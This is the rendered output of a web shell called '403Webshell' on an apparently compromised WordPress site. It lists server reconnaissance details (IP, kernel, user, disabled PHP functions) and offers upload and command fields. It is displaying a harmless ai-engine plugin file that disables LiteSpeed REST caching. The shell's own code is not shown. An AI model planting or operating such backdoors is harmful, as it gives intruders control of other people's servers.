403Webshell
Server IP : 104.26.3.156  /  Your IP : 216.73.216.185
Web Server : nginx/1.27.1
System : Linux us-1 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64
User : vinodai ( 3134)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /storage/v1396/wwwindicidolscom/public_html/wp-content/plugins/ai-engine/common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /storage/v1396/wwwindicidolscom/public_html/wp-content/plugins/ai-engine/common/issues.php
<?php

if ( !class_exists( 'MeowKit_MWAI_Issues' ) ) {

  class MeowKit_MWAI_Issues {
    public function __construct( $prefix, $mainfile, $domain ) {
      $this->check_plugins();
    }

    public function check_plugins() {

      // Previous technique to disable caching on the REST API.
      // if ( class_exists( 'LiteSpeed\Core' ) ) {
      //   $this->check_litespeed();
      // }

      // Recommended technique to disable caching on the REST API by the Litespeed team.
      if ( defined( 'LSCWP_V' ) ) {
        do_action( 'litespeed_control_set_nocache', 'Meow Apps API must not be cached.' );
      }
    }

    public function check_litespeed() {
      // By default, the REST API is cached by Litespeed. Why is that?
      // It is absolutely not a good idea, especially on the admin side.
      $cache_rest = get_option( 'litespeed.conf.cache-rest' );
      if ( $cache_rest ) {
        update_option( 'litespeed.conf.cache-rest', 0 );
      }
    }

  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit